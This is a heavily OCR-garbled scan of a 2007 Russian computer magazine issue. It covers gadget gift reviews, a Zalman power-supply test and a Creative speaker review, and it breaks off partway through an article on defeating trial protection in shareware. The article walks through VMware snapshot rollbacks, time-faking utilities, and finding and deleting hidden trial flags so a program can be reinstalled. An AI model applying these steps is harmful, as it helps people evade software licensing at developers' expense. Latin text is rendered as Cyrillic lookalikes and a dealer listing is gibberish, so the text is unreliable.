СЕЫШ88РЕЕР 

ѴУНЕЕЬКѴЕЕ 

Цена: $85 

Са Йт: ѵѵѵѵѵѵ. д е п і и в . ги 

Истинное удовольствие от игры в автомобильные симуляторы можно 
получить только с хорошим комплектом руля и педалей. Технология 
ТоисбЗепсе придаеттакой игре реалистичность благодаря встроенным 
вибромеханизмам. Отдельный блоке рычагом переключения передач 
позволяет переключаться как в автоматическом, так и в ручном режиме. 
Руль надежно крепится к столу с помощью кронштейна и присосок. Очень 
крутой подарок. 
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ѴОХТЕЬ СЛККЕЕА 
Х350 



Цена : от 1 5 990 рублей 
Сайт: ѵѵѵѵѵѵ.Бопу.ги 



Цена: 7999 рублей 
Сайт: ѵѵѵѵѵѵ.ѵохіеі.ги 



Для любителей игр всех мастей. Графика и производительность впечат- 
лят любого. Уже прошло достаточно времени с момента запуска пристав- 
ки в продажу, поэтому ассортимент игр достаточно широк. Единственное, 
что может смутить, — высокая стоимость игрушек. Но тут уж придется 
выбирать: либо покупать качественные, но дорогие продукты, либо оста- 
ваться на РС и бороться стормозами путем бесконечных апгрейдов. 



ил 



ѴОХТЕЬ 211 

Цена:! 799 рублей 
Сайт: \ллллл/.ѵохІе1.ги 

Времена, когда домашние телефоны имели диски набора номера и про- 
тивно звонили, давно прошли. Теперь домашние трубки беспроводные, 
имеютЖК-дисплей и радуют слух полифоническими мелодиями. А еще 
они стильно выглядят и имеют встроенный определитель. Новая модель 
отѴохІеІ в корпусе «под алюминий» обладает всеми этими и рядом других 
свойств. 




6Р5-навигатор с сенсорным экраном. Благодаря навигационной систе- 
ме«Навител Навигатор 3.1» позволит не заблудиться нетолько в Москве 
и Питере, но и в нескольких других городах России. Если карт не хватает, 
то можно найти необходимые в интернете и сконвертировать их в формат 
ЫТМ. Также можно создать свои собственные карты с помощью утилиты 
бРБМарЕОІТ. 
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Процессор ГпШ® Сеге ™ 2 Оио 15600 
Беспроводная сеть ШіГі 
Привод 0Ѵ0-В1/Ѵ 
Гарантия 3 года 



іп 



Сепігіпо 

Оно 



Соге 2 Оуо 



ЧЯ-і 



той Л РАКТМЕЯ РОК 51131 N ЕМ 



Ноутбук $0® 5ѴУ15 
с технологией Іпіеі® Сепігіпо Оно 



жѵіміѵ. 5 гі 2 Ь.ги 



дня мобильных ПК похвалит Вам наслаждаться цифровыми 
развлечениями нового уровня и будет сопровождать Вое повсюду, 



где купить 

Г. Ндіііі, ЗАО Цейки 1.449,1 Т ЭО ■ 0 1 04 . ЗАО ДОПИНГ Кг.іиплиі:пиі ИТ Сіво*(Ь 1*99) І45-ІШ АѴд СэшрпНц )гдир ні Мджіаркді* рідн-;р.. ні« 
МвялІСЕдг цшсее, идвлідкнгі рл^ипципп» пвжгьпми 9 > 3? ■ З'ЭУ 4Ѵ4 Ссгг рчідг і- дгдир нр Мігнхскди рр&ідрннвііТК 'иііичрвнА^ Ааріг; 
ПіінисеО* ш-зесі, вМнЕ-ні 14. Трргрриі к№|(1 и N-4- 900 ‘МП Крил і к; ■ р‘ Лінингрздскнл прзегшг дяіг |й іррл.т Б'.дфкс ?й ' ТіЩЦОаи 
<4«| 15МШ. им»! 'ИТІ ІЕ4‘ Г М Роми Я- Э Еі>рп Ч ТдіТ (43.Ы 447-ЯМ *, 141 .«-И 'Нд*|Л- Г |4Н, Л4-7Й-И, Им1*(Н*Т е»і*).н Жп» М Г.|і го- 
1 [499| 772-0079, 31МИ1. Сет» мріцрнй* Цифви Б*і$'*ти«нйіСЕиі провдд і } ТЦ РИО' гп 4<}.и«*і Ч*рп*ушина 1. Т(І Чвевиѵші»' 
уи Прдфсвчзн]*, І1 1 Ш.И, ПАЛМ А. Надія 13. 14 Сі»«г-П«іврдррі Мдедп' г <$і?| 299-49 97 СііыіІгиіИСі 'Црфрм т 1.01?} 320-8030 
гЛѳддіьсі 'Слстднвіл Аидмлтвлщп тодгмпи' т#7| 08-К-79. г.СсіврвАЛ»«Сі. ми Тдяядішр* г |Ш4; НМНЮ, (ЙШ) 52-00-94. Мри»е»:і 
Трупп* Сіврр' З.Ц1|!| 86-19-01. г.Иигиіт(Е#ркі '4СТ' т 1 351 9} 27 09 $1 г.ЙрЕуісі. 400 'Фирчл 4мп*ік' уп Вдлгдри*! ЕЁ ), 1 ^ Э9г52 !• ?4 00 2* 



СМнеп С«<«пп іішй*. д*пІгМщ. Ошглл Іо^п. С гм#. Іг.<,>лі' іпг-і. ІпШ I пдд ІпШСпти. ІпДяІ ІгцИд. Мііпі Іп<Мн Іодд. Мііні Чн* ( Іп№ ЛТп, Иіпіигг. ;Іягкі>т ЫЛ*. 
Рлпіц^г ГЧтщт Іпц». Х«т. и Ходя ІЧИІ* Рпнцтея іси>*іи.і энпмдш пдаа чшатерн* фмиммп киріммапп і#вриі№,і США" ДРутмі (ір*ч 




т'еггигп 



80ЫУСУВЕК-8Н0Т 

В8С-Т2 





Цена: 14849 рублей 
Сайт: ѵѵѵѵѵѵ.БопузІуІе.ги 

Маленький и стильный фотоаппарат — хороший подарок для любителя 
фотографировать как мужского, так и женского пола. Благо выбор цветов 
способен удовлетворить и тех и других. 8,1 -Мп оптика Сагі 2еІ55 стрех- 
кратным оптическим зумом, 4 Гб встроенной памяти, сенсорный экран 
с функцией редактирования фотографий прямо с аппарата и полностью 
железный корпус — вот неполный список достоинств этого малыша. 



Цена: 9 999 рублей 
Сайт: ѵѵѵѵѵѵ.сііігате.ги 

Простые рамки для фотографий — это уже прошлый век. В эпоху цифро- 
выхтехнологий фоторамки тоже должны быть цифровыми. 8-дюймовый 
дисплей 800x600, немного встроенной памяти, кардридер практически 
на все известныетипы карт и возможность воспроизведения музыки 
— что еще нужно для отличного подарка? Расцветки — от глянцевого 
черного до розовой крокодиловой кожи. 




СЕЫШ8 8УѴ-НЕ 5.1 
4000 

Цена: $1 15 

Са йт: ѵѵѵѵѵѵ. д е п і и в . ги 

Шестикомпонентная акустическая система, созданная специально для 
любителей музыки, фильмов и компьютерных игр. Позволит насладиться 
звуком 5.1 в любимом шутеретебе и твоим соседям. Для подключения 
к звуковой карте компьютера в комплекте идет переходник. Остается 
только придумать, какуместить всю эту кучу колонок на захламленном 
столе с компом. 



13 




А8У8ѴѴ78 

Цена: 46 900 рублей 
Сайт: ѵѵѵѵѵѵ.азиз.ги 



Отличный ноутбук компактных размеров от известного производителя. 
Мощный камень Соге 2 Оио, 1 .5 Гб памяти, 13.3-дюймовый дисплей с 
разрешением 1 280x800, графический адаптер Г1ѴЮІА ОеРогсе 8400 М 6 и 
полный набор коммуникационных возможностей — все для удобной ра- 
боты и развлечений, где бы ты ни был. В транспорте, на работе, на учебе 
- не важно. Этот ноут сделан специально, чтобы везде носить его с собой 
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Мониторы §упсМа$іег 





Представьте... в плену у стиля 

Вне всяких сомнений, новые мониторы ЗупсМазІег произведут на Вас 
неизгладимое впечатление. Дело не только в потрясающем качестве 
изображения. Достаточно одного взгляда, чтобы Вы убедились - дизайн 
ЗупсМазІег не зря отмечен очередными международными премиями. 
Новые мониторы вызывают восхищение, даже когда они выключены. 

Мониторы ЗупсМазІег. Созданы покорять. 



2232ВѴѴ 2032ВѴѴ 



• Время отклика 2 мс • Премия ІР МаіегіаІ АѵѵагсІ 

• Динамическая контрастность 3000:1 • Премия ІР Ргобисі Оезідп АѵѵагсІ 



р р ■ ■ 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея 8ат$ипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵ\л/\л/.$атзипд.ги. Товар сертифицирован. Реклама. 





Питаемся в тишине 



Блоки питания 2а1тап 2М850-НР и 2а1тап 2М750-НР 

Большинству пользователей компания 2а1тап известна в первую очередь благодаря вы- 
сокоэффективным системам охлаждения. Их уже успели оценить по достоинству овер- 
клокеры и энтузиасты. Однако любая организация или фирма при достижении опреде- 
ленного успеха в своем деле совершает попытку расширения сферы своего влияния. Так 
поступает, например, компания Согзаіг, запустив в производство серию блоков питания 
на базе хорошо известных моделей от Зеазопіс. Но Согзаіг была явно не первой. Ребята 
из 2а1тап уже давно занимаются изготовлением собственных решений из сферы РЗЦ, 
используя проверенные временем наработки в области охлаждения. Насколько успешно 
у них это получается, мы проверили сами. 



Н МЕТОДИКАТЕСТИРОВАНИЯ 

В первую очередь хотелось бы несколько слов сказать о специфика- 
циях. Под типом устройства мы подразумеваем вариант соединений. 

В последнее время очень многие производители вводят в каждую ли- 
нейку блоки питания с отключаемыми шлейфами и линиями. По поводу 
разумности такого подхода есть разные мнения, однако не указать это 
было бы большим упущением. Киловатные блоки сильно потолстели, а 
посему не помешает и информация о размерах корпуса. После осмотра 
схемотехнических особенностей (для этого блок питания разбирался 
— снималась верхняя крышка), дизайна и системы охлаждения мы 
переходили непосредственно к эксперименту. Тестирование произво- 
дилось с помощью нагрузочного І_РТ-блока Рогтога РоѵѵегСЬеск, ко- 
торый мы используем для испытаний импульсных источников питания. 
Возможности нашего І_РТ-блока были приведены в должное состояние, 



поскольку в первоначальном варианте нагрузка могла осуществляться 
только в небольших пределах (в базовом варианте — до 350 Вт). Сейчас 
тестовый стенд способен работать с блоками до 1 500 Вт. Особое внима- 
ние уделялось эффективности работы при заданных нагрузках, а также 
просадкам напряжений на шинах. Оценка КПД блоков питания 2а1тап 
была выполнена на несколькихточках с шагом в 1 00 Вт: 300 Вт, 400 Вт, 
500 Вт, 600 Вт, 700 Вт и на максимальной заявленной мощности. Допол- 
нительно мы указываем в результатах данные коэффициента мощности 
для протестированных блоков в зависимости от нагрузки, рассчитан- 
ные на основе полученных осциллограмм. Предварительно отметим, 
что в связи с особенной конструкцией блоков питания от 4а1тап и ак- 
центе производителя на охлаждение мы учитывали и фактор шумности 
устройств. Для этого из помещения удалялось все, что создает лишний 
шум, чтобы в полной тишине оценить звуковые параметры нагнетателя. 
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Технические характеристики 
2аІтап2М750-НР: 

ІІЫІИ $220 

Щ стандарт* модуль 



Соединении типа Г 



1 2 (8-контактных) 



активная РРС 



|сертификат5Ы, 8-контакт- 



ные разъемы 

ІЙ4Ш‘1 ! ІІ 1і;0хі80х86мм 



Технические характеристики 
2аІтап2М850-НР: 

^■$250 

Щ стандарт + модуль 



ІЭаявленная мощность: 
Уединении типа МІ)І_Е) 



1 2 (6-контактных), 2 



(8-контактных) 



активная РРС 

ЩЩіЗІДЩЗЗЗЗДсоответствие стандарту 80 
Ріиз, 8-контактные разъемы 
ІіЖіН*І і 1І 210x1 50x86 мм 



^ 2ММАЫ 2М750-НР 

Компания 2аІтап уже выпускала линейки серии 2М-НР с использовани- 
ем оригинальных систем охлаждения. В этом, собственно, и конек про- 
дуктов отэтой фирмы. Пока большинство производителей думали, как им 
сделать блок мощнее, чем у конкурентов, инженеры 2аІтап не гнались 
за ваттами, а уделяли вниманиетихой работе устройства. Ведь пользо- 
ватель хочет не только надежности, но и комфорта при работе с системой. 
Ну а назойливое жужжание на многих действует просто деструктивно. В 
июне этого года 2аІтап представила продолжение своей популярной ли- 
нейки импульсных источников питания. Ранее мы уже знакомили наших 
читателей с 500- и 600-ваттными решениями. Теперьже очередь дошла и 
до самых производительных моделей. Начнем для начала с блока 2аІтап 
2М750-НР, а самое интересное оставим на десерт. 

В связи стем что видеокарты потребляют все больше, да и остальные 
комплектующие не отстают, мощный блок просто необходим и фанатич- 
ному геймеру, и собирателю комнатного сервера. Блок питания 2аІтап 
2М750-НР способен выдавать 750 Вт — даже для мощного компьютера 
это весьма неплохо. Поставляется он в красочной коробке суказанием 
характеристик и особенностей. Производитель обещает покупателю три 
года гарантии на свой продукт. Сам блок модульный, но не полностью. 
Некоторое количество шлейфов выведено напрямую — сюда можно 
отнести три БАТА-соединения и один РСІ-Ехргезз разъем. Чтобы поль- 
зователь не перепутал по неосторожности шлейфы местами, производи- 
тель предусмотрел специальную систему соединения — каждый кабель 
встаеттолько на свое место. Корпус устройства выкрашен в черный цвет. 
Покрытие матовое и устойчиво к легкому механическому воздействию. 
Следы от пальцев на корпусе не остаются, как и царапины. Охладителя 
внутри два: пара алюминиевых пластин с имитацией лепесткового раз- 
деления граней для достижения лучшего теплораспределения, а также 
два качественных радиатора, соединенных медной тепловой трубкой. 
Обдувом элементов занимается вентилятор АйОА Ай 1 21 2МВ-А71 ОБ, 
выполненный в форм-факторе 1 20- мм. Такие вертушки ставят в блоки 
Беазопіс, в частности такие модели использует серия М 1 2. Стоит похва- 
лить 2аІтап за хороший выбор — охлаждение действительно бесшумно 
даже при серьезных нагрузках. 

^ 2АІ.МАЫ 2М850-НР 

Блок питания 2аІтап 2М850-НР выглядит кактипичный «тысячник». То 



есть имеетудлиненный корпус и большой вентилятор. Блоки питания 
на 1000 Вт и выше на сегодняшний м оме нт всего л ишь демонстрация 
возможностей производственной базы. Они достаточно сильно шумят, 
обладают зачастую низким коэффициентом полезного действия. По 
сравнению с упаковкой рассмотренного ранее БП, коробка 2аІтап 
2М850-НР достаточно больших размеров. Внутри можно найти два 
продолговатых ящичка из коричневого картона, в которых хранятся до- 
полнительные шлейфы и кабель питания. Производитель также не стал 
делать полностью модульный блок, выпуск которых практикуют многие 
производители, да и стандартные модели не всегда удобны. Необходи- 
мый минимум разъемов уже предусмотрен — все, что нужно, можно под- 
ключить по желанию. Количество поддерживаемых разъемов поражает 
воображение. Этот БП может вытянуть на себе десяток винчестеров на 
молексе да еще и запитать десять штук 5АТА-носителей. Любители игр 
также не останутся внакладе. Блок оборудован четырьмя раздельны- 
ми шлейфами РСІ-Ехргезз. Два из них соединены напрямую и могут 
работать в режиме «6+2». Видеокарты АМО/АТІ последнего поколения 
требуют восьмиконтактные разъемы, так что собрать полноценный тан- 
дем из адаптеров с поддержкой СгоззЯге не составиттруда. Что касается 
технической начинки, то производитель постарался на славу. Элементы 
посажены достаточно плотно, но проблем с перегревом им не светит. 

По длине корпуса растянулись алюминиевые радиаторы, пронзенные 
тепловыми трубками. На задней стенке, через которую выбрасывается 
горячий воздух, установлены пластинчатые элементы охлаждения с час- 
тым ребрением. На каждый продолговатый радиатор приходится один 
ребристый. Вентилятор имеет диаметр 140 мм. Работаетон оченьтихо 
— мы не ожидали от блока столь высокой мощности такого потрясающего 
уровня тишины. 

г выводы 

На первый взгляд нестандартные элементы, использованные при 
изготовлении БП, могутбыть расценены как неразумное вмешательство. 
Достаточно было бы поставить вентилятор мощнее, и проблема с охлаж- 
дением решена. Однако инженеры 2а1тап хорошо знают свое дело. Судя 
по результатам тестирования, мы имели дело не только стихими, но еще 
и с высококлассными блоками питания. Хороший уровень КПД, отсутс- 
твие завалов по всем линиям, качественное охлаждение характеризуют 
2аІтап 2М850-НР и 2аІтап 2М750-НР с положительной стороны, ц-ц 
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СТЕПАН ИЛЬИН 

/ $ТЕР@САМЕЬАЫО. В II/ 



ЗВУК 2.0 



КАЧЕСТВЕННЫЕ ДВУХКАНАЛЬНЫЕ КОЛОНКИ СКЕАТІѴЕ: ТіО, Т20 И Т40 



Давно прошло время тотальной моды на 6- и 8-канальный звук: люди поняли, что эти достаточ- 
но громоздкие и дорогие комплекты акустики им не очень-то и нужны. Особенно тогда, когда 
тратить много денег и прокладывать семиканальные трассы из дорогого провода не входит 
в планы. В этом случае лучше купить набор качественной двухканальной акустики, которая 
будет выдавать чистый звук и глубокие басы, чем чертыхаться на дешевые 5.1-скрипелки. 



Фирма Сгеабѵе 



| — один из самых авторитетных производителен мультиме- 
дийной акустики, который всегда славился качеством продукции. Поэтому 
мы решили искать качественный 2.0-звукименно среди ее моделей. 
Вообще, выбор двухканальной акустики Сгеабѵе достаточно велик, но 
мы остановимся на трех моделях: Сгеабѵе ІпзрігеТІО, 6ідаѵѵогкзТ20 и 
Т40, поскольку это самые свежие модели, которые ктомуже полностью 



удовлетворяютзапросы самых разных людей. Объем этого материала 
ограничен, поэтому о ТІО и Т20 я просто расскажу, а вотТ40 мы разберем 
и посмотрим, что там внутри. Сам увидишь, почему из этих колонокльется 
такой чистый звук. 




Ш5РІКЕ ТІО — очень компактные колонки, они не будутзанимать 
много места на столе. Но не спеши проводитьанало- 
гии с дешевыми китайскими «погремушками». Здесь 
качество совсем другое. Динамики располагаются в очень стильных черных 
корпусах, и в ходе беглого осмотра легко заметить наличие выделенных 
твитеров — маленьких высокочастотных динамиков, служащих специально 
для воспроизведения высоких частот. В обычных колонках сигнал не де- 
лится: все проигрывается на одном динамике, который, понятное дело, не 
может одинаково хорошо играть во всем диапазоне частот. В этой же моде- 
ли, несмотря на скромные размеры и цену, присутствуют отдельные твитеры 
для высоких частот, а также реализована фирменная технология ВазХРогІ: 
для достижения глубоких басов без использования вынесенного сабвуфе- 
ра. Добавьсюда трехдюймовые драйверы средних частот, качественное 
экранирование для защиты от наводок — и получишь ІпзрігеТІО. 



Главное 

• Мощность: 5 Вт РМ5 на канал 

• Частотная характеристика: 80 Гц — 20 кГц 

• Отдельные твитеры высоких частот 

• Фирменная технология ВазХРоНдля сильных басов 

• Качественное экранирование для защиты от наводок со стороны 
монитора и другой техники 




СІСАѴѴ0КК5 Колонки Т20 принадлежат к другому семейству 
Т20 акустики — бідаѵѵогкз. Как легко понять по 

названию семейства и увеличению числового 
индекса, это более мощные колонки: мощность каждого канала составляет 
уже не 5, а 14 Вт. Внешний вид говоритотом, что эта модель посерьезнее. 
Увеличенные широкополосные динамики снабжены 60-мм диффузорами из 
стеклокерамики желтого цвета, а высокочастотные твитеры имеют диаметр 
25 мм. Благодаря тому что силовой трансформатор инженеры решили выне- 
сти за пределы корпуса колонок, им не пришлось зажиматься по мощности, 
и вкупе судачно спроектированным фазоинвертором это позволило до- 
биться реально впечатляющих басов, которые заставят любого стороннего 
человека заподозрить тебя в спрятанном где-то сабвуфере. Что особенно 
приятно, искажения на большой громкости практически отсутствуют. Итог 
— отличные колонки для компьютера или ноутбука, которые подойдут даже 
настоящим цифровым меломанам. 



Главное 

• Мощность: 14 ВтРМБ на канал 

• Частотная характеристика: 50 Гц — 20 кГц 

• Отдельные тв итеры высоких частот диаметром 25 мм 

• Широкополосные динамики с 60-мм стеклокерамическими диффузорами 

• Фирменнаятехнология ВазХРогІдля сильных басов и вынесенный за 
пределы колонок блок питания, дающий большой запас по мощности 
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Один из двух широкополосных 



динамиков, 60 мм 



Труба фазоинвертора 




Іобложена мягким мате-| 



Іриалом, чтобы басы были 



четче и мощнее 



|Тканевыйтвитер куполо-| 



|видной формы 



[Широкополосный ди-| 



|намикс конусовидными 



|диффузорами| 



|Плата питания 



с большим запасом по 



мощности 



Плата управления звуком 



03 



Вот мы и добрались до самой сильной модели. 
Стереофоническая система Т40 включает в 
себя два стекловолоконных широкополосных 
динамика с 60-мм диффузорами и один высокочастотный тканевый твитер, 
соединенные в одну систему по конфигурации МТМ (средняя частота — вы- 
сокая частота — средняя частота]. Это обеспечиваетсбалансированное и 
объемное звучание с хорошим пространственным разрешением. Эти колон- 
ки можно рекомендовать нетолько для использования с компьютерами, их 
можно смело подключать ктелевизору или ВѴО-проигрывателю. 

В принципе Т40 — это дальнейшее развитие 6ідаѵѵогк5Т20, которое отли- 
чается от младшего брата добавленным широкополосным динамиком и 
подключением по системе МТМ. Поэтому секрет качественного звучания мы 
решили изучать именно на примереТ40. Сейчас мы разберем эти колонки и 
посмотрим, что там внутри. 



Регуляторы: громкость, 
басы и высокие частоты 



Главное: 

• Мощность: 14 Вт РМ5 на канал 

• Частотная характеристика: 50 Гц — 20 кГц 

• Дополнительный широкополосный динамике 60-мм диффузором 

• Подключение по системе МТМ 

• Фирменнаятехнология ВазХРог1:для сильных басов и вынесенный за пре 
делы колонок блок питания, дающий большой запас по мощности 

• Почти полное отсутствие искажений на высокой громкости 

• Купольная форма тканевых высокочастотныхтвитеровц-ц 



СІ6АѴѴ0КК5 

Т40 
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^'дизассемблера 
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НИВЕРСАЛЬНЫИ 



взлом 



РИАЛЬНЫХ ПРОГРАММ 



В шароварах широко распространены триальные защиты, в результате чего мы получаем 
полнофункциональную программу, работающую 30 дней или около того, а потом — де- 
ньги на бочку или до свидания. На самом деле 99% триальных защит ломается на автома- 
те без напряжения мозговых извилин. Ни знания ассемблера, ни навыка работы с отлад- 
чиком, ни утомительного поиска торкающего кряка/серийника/кейгена не требуется. 
Вот наш рассказ о слабости большинства защитных механизмов! 



с 



Триал 




Е 



ена шаровар невелика и в среднем составляет порядка 
20-50 долларов, однако десяток мелких утилит уже обгоняет в 
стоимости легальный дистр ѴѴіпсіоѵѵзХР и вплотную прибли- 
жается к стоимости таких мощных пакетов, как, например, 
РЬоІюзЬор. Но если на РИо1о5Ьор'е многие реально зарабатывают деньги 
(и его приобретение окупается], то эти утилиты выкачивают деньги, делая 
жизнь приятной в мелочах, но не собираются возвращать их назад, так что 
разработчикам шаровар следует задуматься о ценовой политике. Сниже- 
ние стоимости в два раза зачастую повышает продажи в четыре! 

Даже если человек хочет заплатить за программу, чтобы стать настоящим 
зарегистрированным пользователем, в большинстве случаев он не может 
этого сделать из-за неразвитости платежных систем. Перевод денег 
требует слишком большихтелодвижений, убивающих всю мотивацию на 
корню («Я воттуттрясу деньгами, а у меня их не берут! Ну и не надо! Пойду 
лучше кряк поищу!»). Давно замечено, что игры для сотовых телефонов 
чаще покупаются, чем ломаются. Во всяком случае, процент пиратства там 
в разы ниже, чем на ПК. А почему? Да все потому, что купить игру, отправив 
эта, проще, чем лазить по Сети в поисках кряка, рискуя подцепить трояна 
или другую заразу. 

Мыщъх, демонстрируя разнообразныетехники взлома, в первую очередь 
стремился показать слабость и бесполезность популярных защитных меха- 
низмов, неспособных остановить даже квалифицированных пользовате- 
лей, вооруженных набором утилит, входящих в штатную поставку операци- 
онных систем семейства ѴѴіпсІоѵѵз ІЧТ, не говоря уже о специализированных 
хакерских отмычках! 

^ КАКИЕ БЫВАЮТ ЗАЩИТЫ 

Условно-бесплатные программы можно разделить на две большие катего- 
рии. В первую (самую многочисленную] попадаютполнофункциональные 
шаровары, защищенные испытательным сроком (он же триал отанглий- 
ского {гіаі — «испытание», «проба»), а во вторую — демонстрационные 
версии, в которых часть кода физически отсутствует и соответствующая 



функциональность не реализована (например, нельзя распечатать или 
сохранить документ). 

Демонстрационные версии, как правило, не имеютограничения срока 
пользования, но взломать их непросто. Теоретически недостающий код 
можно дописать и прицепить к программе через 0І_І_, но для этого как 
минимум потребуется разобраться со всеми внутренними структурами дан- 
ных, что требует кропотливого дизассемблирования. Аэто и опыт, и время. 
Короче, возиться с демками не резон. 

Мы будем говорить исключительно отриальных программах. Чтобы огра- 
ничить срок своего использования, защита должна где-то вести счетчик 
запусков или запоминать день своей инсталляции, сверяя его стекущей 
датой. Еще программа должна установить скрытый флаг, не удаляющийся 
при деинсталляции для предотвращения повторной установки. Если бы 
такого флага не существовало, даже неквалифицированный пользователь 
могбы легко обмануть защиту, просто удалив программу и тут же переус- 
тановив ее. Обнаружив и удалив этот флаг вручную, хакер может взломать 
программу, ни разу не разобравшись вустройстве защитного механизма. 
Загвоздка втом, где может храниться защитный флаг. Очевидно, не в ката- 
логе самой программы, поскольку в этом случае он гибнет при его удалении 
(а удалить каталог программы — первое, что придет в голову пользователю]. 
Следовательно, это должен быть либо катал о г ѴѴіпсІоѵѵз (включая все подка- 
талоги], либо реестр. Программы времен М5-005 записывали флагсвоего 
присутствия в энергонезависимую СМ05-память, в физические сектора 
жесткого диска или в другие злачные места, но сейчас время защит по- 
добного типа уже прошло. Впрочем, это неудивительно, поскольку запись 
в СМ05 возможна только с нулевого кольца (то есть защите понадобится 
драйвер), а низкоуровневая работа с жестким диском нуждается в правах 
администратора и вызываетсрабатывание проактивных антивирусныхтех- 
нологий, в результате чего защищенная программа теряетзначительную 
часть рынка и пользователи начинают шарахаться отнее, какотприведе- 
ния, что, в общем-то, вполне закономерно. 

Какпоказываетличный опытавтора, реестр и каталогѴѴіпсІоѵѵз покрыва- 
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ют приблизительно от 90% до 96-99% всех триальных программ, что дает 
большую вероятность успешного обхода триала. Но прежде рассказать о 
поисках флага регистрации, рассмотрим пару альтернативных способов 
взлома. 

^ ВИРТУАЛЬНЫЕ МАШИНЫ 

Росттактовой частоты современных процессоров вызывает ответный рост 
интереса к всевозможным эмуляциям. Продвинутые виртуальные машины 
типа ѴМѵѵаге позволяют вполне комфортно работать с ѴѴіп б оѵѵз 2000 уже на 
Репбит III 733 МН г, а на Репііит 4 все уже просто летает. 

Поддержка виртуальной мыши и общего буфера обмена существенно упро- 
щает работу с гостевыми осями. Поумолчанию виртуальная мышь всегда 
включена. Просто перемещаем курсор внутрь окна ѴМѵѵаге и автоматиче- 
ски переключаемся на гостевую операционную систему. Соответственно, 
переводя его за пределы окна, возвращаемся косновной (Ьозі) опера- 
ционной системе. А поддержка виртуальной сети позволяет программам 
работать с интернетом (если, конечно, им это нужно). В общем, не жизнь, а 
самая настоящая сказка. 

Нетакуж трудно раз в месяц переустановить гостевую ось со всеми три- 
альными программами, а в последних версиях ѴМѵѵаге все даже проще. 
Механизм Ресогб/Реріау позволяет создавать слепки операционной сис- 
темы, проигрывая их сколько угодно раз. Очевидно, что, создав слепок до 
установки защищенной программы и выполнив откат, реально установить 
ее заново сколько угодно раз и защита этому не воспрепятствует (на самом 
деле воспрепятствует, но об этом мы поговорим чуть позже). 

В общем, использование виртуальных машин — это нетакая ужи безумная 
идея. Она хорошо работает со сложными защитами, которые не удается 
взломать никаким другим путем. Однако если программа требует прямого 
доступа кжелезу (особенно к видеокарте), то ѴМѵѵаге тут не поможет. Допус- 
тим, устанавливаем мы поверх ѴМѵѵаге видеоплеер, и что? Ни аппаратного 
сглаживания изображения, ни оверлея для правильной цветопередачи... 
и, чтобы нетормозило, потребуется нехилая мощность ЦП. Тоже самое 



относится кЗО-играм и скринсейверам. Действительно, какой смысл в 
скринсейвере, если он работаеттолько под ѴМѵѵаге?! 

г ИГРЫ СО ВРЕМЕНЕМ 

Перевод системных часов назад — самый популярный способ взлома, но, 
естественно, не самый удачный. Во-первых, какуже говорилось выше, 
программа может вести счетчикзапусков, а во-вторых, с переведенными 
системными часами работать очень неудобно. Впрочем, в последней беде 
легко помочь! 

Существует множество утилиттипа Тгіаі Ргеегег, «замораживающих» триал 
путем подсовывания защищенной программе поддельного времени. При 
этом системные часы продолжают идти правильно и остальные программы 
работают как ни в чем не бывало, то естьТгаіІ Ргееіегдействуеттолько на 
ломаемую программу. 

Ксожалению, универсального способа навязывания поддельного времени 
не существует, и даже простая защита без труда определит, что ее поимели. 
В частности, при создании файла на диске ось назначает ему время в соот- 
ветствии с показаниями системных часов. Тгіаі Ргееіегего не корректирует. 
Со всеми вытекающими отсюда последствиями. Ріо полностью отказывать- 
ся от него хакерам пока не спешат. 

г ПОИСК ФЛАГА НА ДИСКЕ 

Предположим, что защита создаетспециальный файл, используя его как 
флагсвоего присутствия. Какбыстро найти его на диске, не зная, в каком 
каталоге он находится, и даже не будучи уверенным в его существовании? 
Достаточно многие хакерские руководства рекомендуют использовать 
знаменитый файловый монитор Марка Руссиновича (РіІеМоп). 

Файловый монитор, конечно, чрезвычайно мощная штука, но среднеста- 
тистическая программа обращается к сотням, а то и ктысячам системных 
файлов: динамическим библиотекам, шрифтам... Замаскироватьфлаг 
своего присутствия под ОІ_І_ или шрифт — плевое дело, а вот обнаружить 
его без отладчика — это ж какую интуицию надо иметь! 



ХАКЕР 12 /108/ 07 



► 037 




рс_гопе 





- 3 



л 3» 



С программой, запущенной из-под ѴМѵѵаге, можно работать та к же, как и с 
бычной программой 
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Не считай это инс- 
трукцией по взлому 
программ. Материал 
лишь рассказывает 
о слабости защитных 
механизмов про- 
грамм. 




> СІѴСІ 

На диске ты найдешь 
упомянутые в статье 
утилиты. 



Не-е-ет! Опытные хакеры идут другим путем! Для этого они 
заходят в Ргодгат Рііез и смотрят на дату создания (не путать 
сдатой М5-005!) файлов программы или дату создания ее 
каталога. А затем начинают искать файлы, датированные этим 
числом. Действуя таким образом, легко находятся все фай- 
лы/папки, созданные программой при инсталляции. Ата кже 
все файлы и папки других программ, установленных в тотже 
самый день. Для простоты предположим, что устанавливается 
не более одной программы в день. Узнать дату создания очень 
просто: достаточно щелкнуть по файлу (каталогу) правой кноп- 
кой мыши и в появившемся контекстом меню выбрать пункт 
«Свойства». В РАП’етоже самое делается путем нажатия на 
<СігІ-А>. Поиск осуществляется через тотже самый файловый 
менеджер или меню «Пуск -> Поиск -> Файлы и папки». 
Хорошо, хакер нашел свеженькие файлы, но что стого? А 
далее он сноситзащищенную программу через «Установ- 
ку/Удаление программ», после чего повторяет поиск вновь. 
Файлы, которые не будутудалены, с определенной степенью 
вероятности и окажутся флагами присутствия. Хакеру доста- 
точно ихудалить и переустановить программу. 

В каких случаях описанная техника поиска файлов-флагов не 
срабатывает (разумеется, притом условии, что защита хранит 
флаги присутствия именно в файлах, а не в реестре)? Первое, что 
приходит в голову, — использование ЫТРБ-потоков. Да, дейс- 
твительно, на файловой системе ЫТР5 можно беспрепятственно 
создать еще один поток внутри уже существующих файлов, ранее 
созданных други ми программами (если, конечно, узащищенной 
программы достаточно прав). Однако потоки не поддерживаются 
РАТ'ом и пото му дел а ют за щиту крайне неуниверсальной. Ктому 
же о потоках знают далеко не все программисты. В общем, на 
практике потоки используются очень редко. 

А вот что используется часто, так это создание флагов при- 
сутствия уже после установки. При первом запуске программы 
или за несколько дней до истечения срока действия триала. А 
после срабатывания триала очень часто создается еще и флаг 
«Сработал триал». Обнаружить такие флаги позволяет«Поиск 
файлов, созданных за последние... дней», находящийся там 
же, где и «Поискфайлов и папок». 

В ПОИСК ФЛАГА В РЕЕСТРЕ 

Реестр велик и могуч. Он содержит миллионы записей, в кото- 
рых можно спрятать целое государство! Причем далеко не все 
ветви отображаются штатным редактором реестра. Достаточ- 
но многие защиты создают флаги присутствия через пабѵе- 
